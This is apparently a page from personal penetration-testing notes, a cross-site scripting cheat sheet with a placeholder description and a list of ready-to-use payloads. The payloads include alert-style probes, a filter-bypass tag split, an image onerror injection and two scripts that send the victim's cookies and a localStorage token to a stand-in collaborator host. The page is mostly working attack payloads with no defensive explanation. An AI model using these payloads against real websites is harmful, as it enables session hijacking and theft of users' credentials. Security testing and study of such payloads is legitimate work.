search

XSS

hashtag
Description

Here will come a basic description.

hashtag
Payloads

<h1>Test</h1>

<script>prompt()</script>

<scriscriptpt>prompt()</scriscriptpt>

<img src=x onerror=prompt()>

<script>
	fetch('https://COLLAB', {
		method:'POST',
		mode:'no-cors',
		body:document.cookie
});
</script>
<img src=x onerror="
  fetch('https://COLLAB/?token=' +
        encodeURIComponent(localStorage.getItem('token') || 'null'),
        { mode: 'no-cors' });
">
PreviousDaily labsNextCopyPasta

Last updated